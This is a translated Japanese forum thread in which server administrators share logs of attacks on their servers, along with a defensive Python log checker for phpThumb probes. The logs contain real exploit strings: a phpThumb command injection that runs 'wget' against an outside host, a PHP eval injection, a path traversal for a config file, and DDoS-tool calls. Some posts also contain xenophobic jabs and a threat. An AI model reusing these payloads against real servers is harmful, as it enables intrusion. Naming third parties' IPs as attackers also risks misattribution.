Thread for exposing the IPs that have attacked you ("Attack No.1")

Replies: 204

Summary: 126.26.247.186
No.101
126.26.247.186
No.102
The sdc domain is trash.
No.103
79.143.179.235 - - [02/Nov/2011:23:49:33 +0900] "GET /webdav/sprint.php?act=phptools&host=66.135.60.226&time=90&port=29465 HTTP/1.1" 200 46 "-" "-"
79.143.179.235 - - [03/Nov/2011:00:17:19 +0900] "GET /webdav/sprint.php?act=phptools&host=2.216.249.129&time=120&port=49648 HTTP/1.1" 200 46 "-" "-"
79.143.179.235 - - [03/Nov/2011:00:21:27 +0900] "GET /webdav/sprint.php?act=phptools&host=2.216.249.129&time=120&port=51349 HTTP/1.1" 200 46 "-" "-"
79.143.179.235 - - [03/Nov/2011:00:45:24 +0900] "GET /webdav/sprint.php?act=phptools&host=66.246.127.81&time=90&port=80 HTTP/1.1" 200 46 "-" "-"
79.143.179.235 - - [03/Nov/2011:00:52:05 +0900] "GET /webdav/sprint.php?act=phptools&host=81.229.44.61&time=120&port=7171 HTTP/1.1" 200 46 "-" "-"
79.143.179.235 - - [03/Nov/2011:01:00:03 +0900] "GET /webdav/sprint.php?act=phptools&host=90.230.138.205&time=120&port=7171 HTTP/1.1" 200 46 "-" "-"
79.143.179.235 - - [03/Nov/2011:01:09:07 +0900] "GET /webdav/sprint.php?act=phptools&host=83.226.50.111&time=120&port=7171 HTTP/1.1" 200 46 "-" "-"
They keep attacking like this, changing the parameters each time.
Attacks from the same IP have been going on for about a week now; a reverse lookup gives
backup01.xsltel.me
No.105
>103
If you've already identified it, just block it and be done with it...
No.106
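This thread is for information sharing: you write up the URI and circumstances of the "Attack No.1" you received
so that everyone else can use it as a reference, you know.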
No.107
>>105

Read the thread title, scum.
No.108
# grep 222.229.65.227 auth.log|head -2
Nov 27 20:27:38 あああ sshd[9857]: Did not receive identification string from 222.229.65.227
Nov 27 20:31:55 あああ sshd[10280]: Failed password for invalid user root from 222.229.65.227 port 35862 ssh2
# grep 222.229.65.227 auth.log|tail -1
Nov 27 21:05:45 あああ sshd[15613]: Failed password for invalid user root from 222.229.65.227 port 43733 ssh2
# grep 222.229.65.227 auth.log|wc
1846 25606 185870
# host iacp-gw.kochi-tech.ac.jp
iacp-gw.kochi-tech.ac.jp has address 222.229.65.227
Hang in there, admin~.
No.109
Attack 25
No.111
Got attacked three times between yesterday and today from the same provider
114.51.19.152
No.113
I'm Korean, leaving a commemorative post
No.114
I keep getting attacked every day by some scum who I think is the same person
94.23.45.14 - - [20/Dec/2011:11:31:26 +0900] "HEAD / HTTP/1.0" 403 0 "-" "-"
114.51.35.108 - - [20/Dec/2011:12:06:05 +0900] "GET / HTTP/1.1" 403 169 "-" "Java/1.6.0_23"
1.114.107.0 - - [20/Dec/2011:13:58:33 +0900] "GET / HTTP/1.1" 403 169 "-" "Java/1.6.0_23"
1.114.107.0 - - [20/Dec/2011:16:50:56 +0900] "GET / HTTP/1.1" 403 169 "-" "Java/1.6.0_23"
184.173.248.10 - - [20/Dec/2011:18:32:53 +0900] "HEAD / HTTP/1.0" 403 0 "-" "-"
114.51.163.199 - - [20/Dec/2011:19:52:26 +0900] "GET / HTTP/1.1" 403 169 "-" "Java/1.6.0_23"
114.51.163.199 - - [20/Dec/2011:21:46:59 +0900] "GET / HTTP/1.1" 403 169 "-" "Java/1.6.0_23"
207.109.164.19 - - [20/Dec/2011:22:12:50 +0900] "HEAD / HTTP/1.0" 403 0 "-" "-"
114.51.163.199 - - [20/Dec/2011:23:43:18 +0900] "GET / HTTP/1.1" 403 169 "-" "Java/1.6.0_23"
114.51.185.197 - - [21/Dec/2011:12:19:47 +0900] "GET / HTTP/1.1" 403 169 "-" "Java/1.6.0_23"
114.51.80.140 - - [21/Dec/2011:14:58:07 +0900] "GET / HTTP/1.1" 403 169 "-" "Java/1.6.0_23"
114.51.80.140 - - [21/Dec/2011:16:51:15 +0900] "GET / HTTP/1.1" 403 169 "-" "Java/1.6.0_23"
1.115.18.174 - - [21/Dec/2011:18:47:47 +0900] "GET / HTTP/1.1" 403 169 "-" "Java/1.6.0_23"
1.115.18.174 - - [21/Dec/2011:20:44:18 +0900] "GET / HTTP/1.1" 403 169 "-" "Java/1.6.0_23"
50.19.21.165 - - [21/Dec/2011:21:33:18 +0900] "HEAD / HTTP/1.0" 403 0 "-" "-"
1.115.18.174 - - [21/Dec/2011:22:37:54 +0900] "GET / HTTP/1.1" 403 169 "-" "Java/1.6.0_23"
No.115
I looked up the country and it seems to be France; some French brat, I guess. I'll kill you, you hear!
91.121.97.130 - - [27/Dec/2011:03:54:06 +0900] "GET /cms/plugins/content/jthumbs/includes/phpThumb.php?src=file.jpg&fltr[]=blur|9%20-quality%20%2075%20-interlace%20line%20fail.jpg%20jpeg:fail.jpg%20;%20ls%20-l%20/tmp
91.121.97.130 - - [27/Dec/2011:03:54:06 +0900] "GET /wp-content/plugins/ione-core/phpthumb/phpThumb.php?src=file.jpg&fltr[]=blur|9%20-quality%20%2075%20-interlace%20line%20fail.jpg%20jpeg:fail.jpg%20;%20ls%20-l%20/tm
91.121.97.130 - - [27/Dec/2011:03:54:07 +0900] "GET /common/scripts/phpThumb/phpThumb.php?src=file.jpg&fltr[]=blur|9%20-quality%20%2075%20-interlace%20line%20fail.jpg%20jpeg:fail.jpg%20;%20ls%20-l%20/tmp;wget%20-O%
91.121.97.130 - - [27/Dec/2011:03:54:07 +0900] "GET /phpThumb/phpThumb.php?src=file.jpg&fltr[]=blur|9%20-quality%20%2075%20-interlace%20line%20fail.jpg%20jpeg:fail.jpg%20;%20ls%20-l%20/tmp;wget%20-O%20/tmp/f%2067.19
91.121.97.130 - - [27/Dec/2011:03:54:07 +0900] "GET /libs/phpThumb/phpThumb.php?src=file.jpg&fltr[]=blur|9%20-quality%20%2075%20-interlace%20line%20fail.jpg%20jpeg:fail.jpg%20;%20ls%20-l%20/tmp;wget%20-O%20/tmp/f%2067.19.79
91.121.97.130 - - [27/Dec/2011:03:54:08 +0900] "GET /wp-content/themes/wp-max/scripts/phpThumb/phpThumb.php?src=file.jpg&fltr[]=blur|9%20-quality%20%2075%20-interlace%20line%20fail.jpg%20jpeg:fail.jpg%20;%20ls%20-l%20/tmp;
91.121.97.130 - - [27/Dec/2011:03:54:08 +0900] "GET /wp-content/themes/fama/scripts/phpThumb/phpThumb.php?src=file.jpg&fltr[]=blur|9%20-quality%20%2075%20-interlace%20line%20fail.jpg%20jpeg:fail.jpg%20;%20ls%20-l%20/tmp;wge
91.121.97.130 - - [27/Dec/2011:03:54:08 +0900] "GET /gallery/phpThumb/phpThumb.php?src=file.jpg&fltr[]=blur|9%20-quality%20%2075%20-interlace%20line%20fail.jpg%20jpeg:fail.jpg%20;%20ls%20-l%20/tmp;wget%20-O%20/tmp/f%2067.19.7
No.116
>>115

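The whois information says "dedicated server",
so it's probably a rental server or something.
Also, since it is trying to execute commands on the server
by exploiting a vulnerability in a tool called phpThumb(),
the server in question has probably been taken over, I'd guess.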
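A defender-side check for the probe pattern discussed above, as an added example that is not part of the original posts: it flags access-log requests to `phpThumb.php` whose `fltr[]` value carries shell syntax. The sample lines and IP addresses are constructed, and the names `check_line`, `scan` and `SAMPLE_LOG` are hypothetical.

```python
import re
from urllib.parse import unquote

# Request part of a combined-format access log line. The closing quote is not
# required, because pasted log lines are often cut off in the middle of the URL.
REQ_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>[A-Z]+) (?P<target>\S+)')

# Inside a phpThumb filter value "|" only separates parameters ("blur|9"), so it
# is not a signal. Whitespace, ";", "&", backticks and "$(" have no place there.
SUSPICIOUS = re.compile(r'[\s;&`]|\$\(')


def check_line(line):
    """Return (client_ip, path, decoded_filter) for a suspicious request, else None."""
    m = REQ_RE.match(line)
    if m is None:
        return None
    path, _, query = m.group("target").partition("?")
    if not unquote(path).lower().endswith("/phpthumb.php"):
        return None
    # Split on raw "&" first, then percent-decode each key and value.
    for pair in query.split("&"):
        key, _, value = pair.partition("=")
        if not unquote(key).startswith("fltr"):
            continue
        decoded = unquote(value)
        if SUSPICIOUS.search(decoded):
            return (m.group("ip"), path, decoded)
    return None


def scan(lines):
    """Collect every suspicious phpThumb request found in an iterable of log lines."""
    return [hit for hit in map(check_line, lines) if hit is not None]


# Constructed sample lines (documentation IP ranges), modelled on the thread's format.
SAMPLE_LOG = [
    # filter value carrying an appended shell command
    '192.0.2.10 - - [27/Dec/2011:03:54:07 +0900] "GET /phpThumb/phpThumb.php'
    '?src=file.jpg&fltr[]=blur|9%20-quality%2075;%20ls%20-l%20/tmp HTTP/1.1" 404 210 "-" "-"',
    # same probe against another path, truncated the way pasted lines often are
    '192.0.2.10 - - [27/Dec/2011:03:54:08 +0900] "GET /gallery/phpThumb/phpThumb.php'
    '?src=file.jpg&fltr%5B%5D=blur|9%20-quality%2075;%20ls%20-l%20/tm',
    # ordinary thumbnail request with a legitimate filter
    '198.51.100.7 - - [27/Dec/2011:09:12:44 +0900] "GET /phpThumb/phpThumb.php'
    '?src=photo.jpg&w=200&fltr[]=blur|9 HTTP/1.1" 200 5120 "-" "Mozilla/5.0"',
    # unrelated request
    '198.51.100.7 - - [27/Dec/2011:09:12:45 +0900] "GET /index.html HTTP/1.1" 200 1043 "-" "-"',
]

if __name__ == "__main__":
    for ip, path, flt in scan(SAMPLE_LOG):
        print(f"{ip} {path} fltr={flt!r}")
```

A hit with a 200 status deserves closer inspection of the host than one answered with 403 or 404, since the script was actually present.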
No.117
IP address: 175.105.126.4
Host name: 4.126.105.175.ap.yournet.ne.jp
Country of IP allocation: Japan ( jp )
Area code: N/A
Connection line: type unknown
Prefecture: Osaka
IPひろば search ranking: 17th (48 points)
No.119
78.46.89.6 (liventura-grid.com)
2012/01/08,09:41:21,"-",GET,"/muieblackcat","","1.1",403,3075,"-","","-"
2012/01/08,09:41:22,"-",GET,"//index.php","","1.1",403,3075,"-","","-"
2012/01/08,09:41:23,"-",GET,"//admin/index.php","","1.1",403,3075,"-","","-"
2012/01/08,09:41:24,"-",GET,"//admin/phpmyadmin/index.php","","1.1",403,3075,"-","","-"
2012/01/08,09:41:24,"-",GET,"//admin/pma/index.php","","1.1",403,3075,"-","","-"
2012/01/08,09:41:25,"-",GET,"//db/index.php","","1.1",403,3075,"-","","-"
2012/01/08,09:41:26,"-",GET,"//dbadmin/index.php","","1.1",403,3075,"-","","-"
2012/01/08,09:41:27,"-",GET,"//myadmin/index.php","","1.1",403,3075,"-","","-"
2012/01/08,09:41:28,"-",GET,"//mysql/index.php","","1.1",403,3075,"-","","-"
2012/01/08,09:41:29,"-",GET,"//mysqladmin/index.php","","1.1",403,3075,"-","","-"
2012/01/08,09:41:30,"-",GET,"//typo3/phpmyadmin/index.php","","1.1",403,3075,"-","","-"
2012/01/08,09:41:31,"-",GET,"//phpadmin/index.php","","1.1",403,3075,"-","","-"
2012/01/08,09:41:32,"-",GET,"//phpMyAdmin/index.php","","1.1",403,3075,"-","","-"
2012/01/08,09:41:33,"-",GET,"//phpmyadmin/index.php","","1.1",403,3075,"-","","-"
2012/01/08,09:41:33,"-",GET,"//phpmyadmin1/index.php","","1.1",403,3075,"-","","-"
Followed by a hundred-odd more requests, mostly pma-related
No.120
>>119

I was wondering who on earth (doko no doitsu) would go poking at security holes,
and it turned out to be Germany (Doitsu).
No.121
Got one for the first time in a while
184.105.65.228 guardlayer.com - 2012-02-24 10:06:04 GET /muieblackcat HTTP/1.1 404 385 - -
184.105.65.228 guardlayer.com - 2012-02-24 10:06:07 GET //admin/index.php HTTP/1.1 404 385 - -
184.105.65.228 guardlayer.com - 2012-02-24 10:06:07 GET //admin/pma/index.php HTTP/1.1 404 385 - -
184.105.65.228 guardlayer.com - 2012-02-24 10:06:07 GET //admin/phpmyadmin/index.php HTTP/1.1 404 385 - -
184.105.65.228 guardlayer.com - 2012-02-24 10:06:08 GET //db/index.php HTTP/1.1 404 385 - -
184.105.65.228 guardlayer.com - 2012-02-24 10:06:08 GET //dbadmin/index.php HTTP/1.1 404 385 - -
184.105.65.228 guardlayer.com - 2012-02-24 10:06:08 GET //myadmin/index.php HTTP/1.1 404 385 - -
184.105.65.228 guardlayer.com - 2012-02-24 10:06:08 GET //mysql/index.php HTTP/1.1 404 385 - -
184.105.65.228 guardlayer.com - 2012-02-24 10:06:09 GET //mysqladmin/index.php HTTP/1.1 404 385 - -
184.105.65.228 guardlayer.com - 2012-02-24 10:06:09 GET //typo3/phpmyadmin/index.php HTTP/1.1 404 385 - -
184.105.65.228 guardlayer.com - 2012-02-24 10:06:09 GET //phpadmin/index.php HTTP/1.1 404 385 - -
184.105.65.228 guardlayer.com - 2012-02-24 10:06:09 GET //phpMyAdmin/index.php HTTP/1.1 404 385 - -
184.105.65.228 guardlayer.com - 2012-02-24 10:06:10 GET //phpmyadmin/index.php HTTP/1.1 404 385 - -
184.105.65.228 guardlayer.com - 2012-02-24 10:06:10 GET //phpmyadmin1/index.php HTTP/1.1 404 385 - -
184.105.65.228 guardlayer.com - 2012-02-24 10:06:10 GET //phpmyadmin2/index.php HTTP/1.1 404 385 - -
184.105.65.228 guardlayer.com - 2012-02-24 10:06:10 GET //pma/index.php HTTP/1.1 404 385 - -
184.105.65.228 guardlayer.com - 2012-02-24 10:06:11 GET //web/phpMyAdmin/index.php HTTP/1.1 404 385 - -
184.105.65.228 guardlayer.com - 2012-02-24 10:06:11 GET //xampp/phpmyadmin/index.php HTTP/1.1 404 385 - -
184.105.65.228 guardlayer.com - 2012-02-24 10:06:11 GET //web/index.php HTTP/1.1 404 385 - -
184.105.65.228 guardlayer.com - 2012-02-24 10:06:11 GET //php-my-admin/index.php HTTP/1.1 404 385 - -
184.105.65.228 guardlayer.com - 2012-02-24 10:06:12 GET //websql/index.php HTTP/1.1 404 385 - -
184.105.65.228 guardlayer.com - 2012-02-24 10:06:12 GET //phpmyadmin/index.php HTTP/1.1 404 385 - -
184.105.65.228 guardlayer.com - 2012-02-24 10:06:12 GET //phpMyAdmin/index.php HTTP/1.1 404 385 - -
184.105.65.228 guardlayer.com - 2012-02-24 10:06:12 GET //phpMyAdmin-2/index.php HTTP/1.1 404 385 - -
184.105.65.228 guardlayer.com - 2012-02-24 10:06:13 GET //php-my-admin/index.php HTTP/1.1 404 385 - -
184.105.65.228 guardlayer.com - 2012-02-24 10:06:13 GET //phpMyAdmin-2.2.3/index.php HTTP/1.1 404 385 - -
184.105.65.228 guardlayer.com - 2012-02-24 10:06:13 GET //phpMyAdmin-2.2.6/index.php HTTP/1.1 404 385 - -
184.105.65.228 guardlayer.com - 2012-02-24 10:06:13 GET //phpMyAdmin-2.5.1/index.php HTTP/1.1 404 385 - -
184.105.65.228 guardlayer.com - 2012-02-24 10:06:14 GET //phpMyAdmin-2.5.4/index.php HTTP/1.1 404 385 - -
184.105.65.228 guardlayer.com - 2012-02-24 10:06:14 GET //phpMyAdmin-2.5.5-rc1/index.php HTTP/1.1 404 385 - -
184.105.65.228 guardlayer.com - 2012-02-24 10:06:14 GET //phpMyAdmin-2.5.5-rc2/index.php HTTP/1.1 404 385 - -
184.105.65.228 guardlayer.com - 2012-02-24 10:06:14 GET //phpMyAdmin-2.5.5/index.php HTTP/1.1 404 385 - -
184.105.65.228 guardlayer.com - 2012-02-24 10:06:14 GET //phpMyAdmin-2.5.5-pl1/index.php HTTP/1.1 404 385 - -
184.105.65.228 guardlayer.com - 2012-02-24 10:06:15 GET //phpMyAdmin-2.5.6-rc1/index.php HTTP/1.1 404 385 - -
184.105.65.228 guardlayer.com - 2012-02-24 10:06:15 GET //phpMyAdmin-2.5.6-rc2/index.php HTTP/1.1 404 385 - -
184.105.65.228 guardlayer.com - 2012-02-24 10:06:15 GET //phpMyAdmin-2.5.6/index.php HTTP/1.1 404 385 - -
184.105.65.228 guardlayer.com - 2012-02-24 10:06:15 GET //phpMyAdmin-2.5.7/index.php HTTP/1.1 404 385 - -
184.105.65.228 guardlayer.com - 2012-02-24 10:06:16 GET //phpMyAdmin-2.5.7-pl1/index.php HTTP/1.1 404 385 - -
No.122
>>121

The same thing has been hitting us too, at around 13:00 and 20:00
No.123
175.194.234.79 - - [26/Feb/2012:14:10:46 +0900] "R\xb7\x95\xda\x87\x9c\xffX\xa1\xb8\x9d\x04g\x9d\xc0\x9c\x96\xde\x1e\xdd\x18\xf6\\\"\x07\xb1\xed\xcb\xe4\xfbT\xa1\xf3\xe8\x82\x9c\x16@\xfe\x1b\xf3+\xb1" 501 335 "-" "-"
What is this, it's scary
Korea (´・д・`) no thanks
No.124
Part of a flood of accesses from Google
It seems to be something different from the search bot
74.125.56.33 74.125.56.33 - 2012-03-02 11:36:41 GET / HTTP/1.0 200 5184 - Mozilla/5.0 (SymbianOS/9.4; U; Series60/5.0 Nokia5230/12.0.089; Profile/MIDP-2.1 Configuration/CLDC-1.1 ) AppleWebKit/413 (KHTML, like Gecko) Safari/413
74.125.56.33 74.125.56.33 - 2012-03-02 11:36:41 GET / HTTP/1.0 200 5013 - Mozilla/5.0 (BlackBerry; U; BlackBerry 9800; en-US) AppleWebKit/534.8+ (KHTML, like Gecko) Version/6.0.0.570 Mobile Safari/534.8+
74.125.56.33 74.125.56.33 - 2012-03-02 11:36:41 GET / HTTP/1.0 200 5013 - Blackberry8520/5.0.0.822 Profile/MIDP-2.1 Configuration/CLDC-1.1 VendorID/100
74.125.56.33 74.125.56.33 - 2012-03-02 11:36:41 GET / HTTP/1.0 200 5013 - Mozilla/5.0 (Linux; U; Android 2.3.3;en-US;GT-I9000 Build/GINGERBREAD) AppleWebKit/525.10+ (KHTML, like Gecko) Version/3.0.4 Mobile Safari/523.12.2
74.125.56.33 74.125.56.33 - 2012-03-02 11:36:41 GET / HTTP/1.0 200 5013 - Mozilla/5.0 (iPhone; U; CPU iPhone OS 4_1 like Mac OS X; en-us) AppleWebKit/532.9 (KHTML, like Gecko) Version/4.0.5 Mobile/8B117 Safari/6531.22.7
74.125.56.33 74.125.56.33 - 2012-03-02 11:36:41 GET / HTTP/1.0 200 5184 - Mozilla/5.0 (Series40; NokiaC3-00/03.35; Profile/MIDP-2.1 Configuration/CLDC-1.1) Gecko/20100401 S40OviBrowser/1.0.0.10.15
74.125.56.33 74.125.56.33 - 2012-03-02 11:36:41 GET / HTTP/1.0 200 5184 - SAMSUNG-GT-C3200/1.0 NetFront/3.5 Profile/M IDP-2.0 Configuration/CLDC-1.1
74.125.56.33 74.125.56.33 - 2012-03-02 11:36:41 GET / HTTP/1.0 200 5184 - Opera/9.50 (J2ME/MIDP; Opera Mini/4.0.8462/8; U; en)
74.125.56.33 74.125.56.33 - 2012-03-02 11:36:41 GET / HTTP/1.0 200 5013 - Mozilla/5.0 (iPhone; U; CPU iPhone OS 4_1 like Mac OS X; en-us) AppleWebKit/532.9 (KHTML, like Gecko) Version/4.0.5 Mobile/8B117 Safari/6531.22.7
74.125.56.33 74.125.56.33 - 2012-03-02 11:36:41 GET / HTTP/1.0 200 5013 - Mozilla/5.0 (Linux; U; Android 2.3.3;en-US;GT-I9000 Build/GINGERBREAD) AppleWebKit/525.10+ (KHTML, like Gecko) Version/3.0.4 Mobile Safari/523.12.2
74.125.56.33 74.125.56.33 - 2012-03-02 11:36:41 GET / HTTP/1.0 200 5184 - Nokia6820/2.0 (4.83) Profile/MIDP-1.0 Configuration/CLDC-1.0
74.125.56.33 74.125.56.33 - 2012-03-02 11:36:41 GET / HTTP/1.0 200 5013 - Mozilla/5.0 (iPhone; U; CPU iPhone OS 4_1 like Mac OS X; en-us) AppleWebKit/532.9 (KHTML, like Gecko) Version/4.0.5 Mobile/8B117 Safari/6531.22.7
74.125.56.33 74.125.56.33 - 2012-03-02 11:36:41 GET / HTTP/1.0 200 5013 - Mozilla/5.0 (Linux; U; Android 2.3.3;en-US;GT-I9000 Build/GINGERBREAD) AppleWebKit/525.10+ (KHTML, like Gecko) Version/3.0.4 Mobile Safari/523.12.2
74.125.56.33 74.125.56.33 - 2012-03-02 11:36:41 GET / HTTP/1.0 200 5104 - SoftBank/1.0/920SH/SHJ001 Browser/NetFront/3.4 Profile/MIDP-2.0 Configuration/CLDC-1.1
74.125.56.33 74.125.56.33 - 2012-03-02 11:36:41 GET / HTTP/1.0 200 5104 - KDDI-CA3A UP.Browser/6.2.0.13.2 (GUI) MMP/2.0
74.125.56.33 74.125.56.33 - 2012-03-02 11:36:41 GET / HTTP/1.0 200 5104 - DoCoMo/2.0 P906i(c100;TB;W24H15)
74.125.56.33 74.125.56.33 - 2012-03-02 11:36:42 GET / HTTP/1.0 200 5013 - Mozilla/5.0 (BlackBerry; U; BlackBerry 9800; en-US) AppleWebKit/534.8+ (KHTML, like Gecko) Version/6.0.0.570 Mobile Safari/534.8+
74.125.56.33 74.125.56.33 - 2012-03-02 11:36:42 GET / HTTP/1.0 200 5013 - Mozilla/5.0 (BlackBerry; U; BlackBerry 9800; en-US) AppleWebKit/534.8+ (KHTML, like Gecko) Version/6.0.0.570 Mobile Safari/534.8+
74.125.56.33 74.125.56.33 - 2012-03-02 11:36:42 GET / HTTP/1.0 200 5184 - Mozilla/5.0 (SymbianOS/9.4; U; Series60/5.0 Nokia5230/12.0.089; Profile/MIDP-2.1 Configuration/CLDC-1.1 ) AppleWebKit/413 (KHTML, like Gecko) Safari/413
No.125
70.62.198.26
rrcs-70-62-198-26.central.biz.rr.com
Persistent
No.126
Stop the vandalism
ip:218.218.181.166
host:KYNfb-02p1-166.ppp11.odn.ad.jp
UA:Opera/9.80 (Windows NT 6.0; U; ja) Presto/2.10.229 Version/11.61
No.127
>126
If it's domestic, send a complaint with logs attached to their ISP. That usually settles it.
No.128
With the lax ones, though, they sometimes just issue a warning and not much changes
The strict ones will suspend the line in one go
How was odn, I wonder...
No.129
"217.36.211.177""2012-03-23 00:57:42""ETCSERVER01""""""""""AUTH=EFAIL:TYPE=LOGIN""" "0""host217-36-211-177.in-addr.btopenworld.com"
There were 8000 lines. Every few seconds, for 16 hours...
No.130
64.27.15.56 USA unassigned.calpop.com
It attacks my mail server
No.131
116.126.87.154 Korea
[Sat May 12 00:47:09 2012] [error] [client 116.126.87.154] Invalid URI in request GET :2086/3rdparty/phpMyAdmin/scripts/setup.php HTTP/1.1
[Sat May 12 00:47:10 2012] [error] [client 116.126.87.154] Invalid URI in request GET :2087/3rdparty/phpMyAdmin/scripts/setup.php HTTP/1.1
[Sat May 12 00:47:10 2012] [error] [client 116.126.87.154] Invalid URI in request GET :81/phpmyadmin/scripts/setup.php HTTP/1.1
Plus 137 other kinds of attack
No.132
Port scans and cracking-tool runs from inside Japan
49.252.168.148
EM49-252-168-148.pool.e-mobile.ne.jp.
No.133
217.41.19.142
dovecot: pop3-login: Aborted login (auth failed, 1 attempts): user=<admin>, method=PLAIN, rip=217.41.19.142, lip=xx.xx.xx.xx
dovecot: pop3-login: Aborted login (auth failed, 1 attempts): user=<admin>, method=PLAIN, rip=217.41.19.142, lip=xx.xx.xx.xx
dovecot: pop3-login: Aborted login (auth failed, 1 attempts): user=<admin>, method=PLAIN, rip=217.41.19.142, lip=xx.xx.xx.xx
dovecot: pop3-login: Aborted login (auth failed, 1 attempts): user=<admin>, method=PLAIN, rip=217.41.19.142, lip=xx.xx.xx.xx
dovecot: pop3-login: Aborted login (auth failed, 1 attempts): user=<admin>, method=PLAIN, rip=217.41.19.142, lip=xx.xx.xx.xx
dovecot: pop3-login: Aborted login (auth failed, 1 attempts): user=<admin>, method=PLAIN, rip=217.41.19.142, lip=xx.xx.xx.xx
dovecot: pop3-login: Aborted login (auth failed, 1 attempts): user=<admin>, method=PLAIN, rip=217.41.19.142, lip=xx.xx.xx.xx
dovecot: pop3-login: Aborted login (auth failed, 1 attempts): user=<admin>, method=PLAIN, rip=217.41.19.142, lip=xx.xx.xx.xx
dovecot: pop3-login: Aborted login (auth failed, 1 attempts): user=<admin>, method=PLAIN, rip=217.41.19.142, lip=xx.xx.xx.xx
dovecot: pop3-login: Aborted login (auth failed, 1 attempts): user=<admin>, method=PLAIN, rip=217.41.19.142, lip=xx.xx.xx.xx
dovecot: pop3-login: Aborted login (auth failed, 1 attempts): user=<admin>, method=PLAIN, rip=217.41.19.142, lip=xx.xx.xx.xx
dovecot: pop3-login: Disconnected (no auth attempts): rip=217.41.19.142, lip=xx.xx.xx.xx
dovecot: pop3-login: Aborted login (auth failed, 1 attempts): user=<admin>, method=PLAIN, rip=217.41.19.142, lip=xx.xx.xx.xx
dovecot: pop3-login: Aborted login (auth failed, 1 attempts): user=<admin>, method=PLAIN, rip=217.41.19.142, lip=xx.xx.xx.xx
dovecot: pop3-login: Aborted login (auth failed, 1 attempts): user=<admin>, method=PLAIN, rip=217.41.19.142, lip=xx.xx.xx.xx
dovecot: pop3-login: Aborted login (auth failed, 1 attempts): user=<admin>, method=PLAIN, rip=217.41.19.142, lip=xx.xx.xx.xx
dovecot: pop3-login: Aborted login (auth failed, 1 attempts): user=<admin>, method=PLAIN, rip=217.41.19.142, lip=xx.xx.xx.xx
No.134
[error] [client 65.74.155.211] File does not exist: /var/www/html/translators.html
[error] [client 65.74.155.211] File does not exist: /var/www/html/phpmyadmin
[error] [client 65.74.155.211] File does not exist: /var/www/html/phpMyAdmin
[error] [client 65.74.155.211] File does not exist: /var/www/html/pma
[error] [client 65.74.155.211] File does not exist: /var/www/html/mysql
No.135
Of the ones coming from inside Japan, a lot are OCN; is there some reason for that?
No.136
Number of users
No.137
Got hit with a DDOS from a mystery ISP called YokozunaNET
No.138
Mongolia, huh lol
No.139
These keep trying to break in on port 22
www23111u.sakura.ne.jp
www3079uh.sakura.ne.jp
www7183ue.sakura.ne.jp
www18135ue.sakura.ne.jp
No.140
ssh (dd_ssh) attack
1.33.202.193
el-labo-s1.el-labo.jp
No.141
So this thread still exists.
For ssh protection, if you just keep denyhosts running it will collect them automatically.
With purge_deny=1y set, it has collected this many.
% egrep ^sshd /etc/hosts.deny | wc -l
968
No.142
218.67.246.197 [2012.8/07-18:53:47 +0900] "POST /index.php/module/action/param1/$%7B@print(eval($_POST%5Bc%5D))%7D HTTP/1.1" 404 REF:-
No.143
>>141

This guy's an idiot
Saying "this many" without even stating the time period
No.144
Must be summer.
purge_deny=1y
You could at least look up what that means before posting.
No.145
I don't think that's what he meant
Summer indeed; is there nobody here but cranks?
No.146
2012/08/21,03:07:39,122.154.101.54,"","-","-",GET,"/vtigercrm/modules/com_vtiger_workflow/sortfieldsjson.php","module_name=../../../../../../../..//etc/amportal.conf","1.1",403,1041,"-","","-"
No.147
It purges after one year, so it's one year's worth of collection, obviously... good grief.
No.148
203.91.121.70
It brute-forces ssh on my server more than ten thousand times every day
Kind of scary
No.149
>>148

You're not the only one who thinks so
ttp://ip-address-lookup-v4.com/ip/203.91.121.70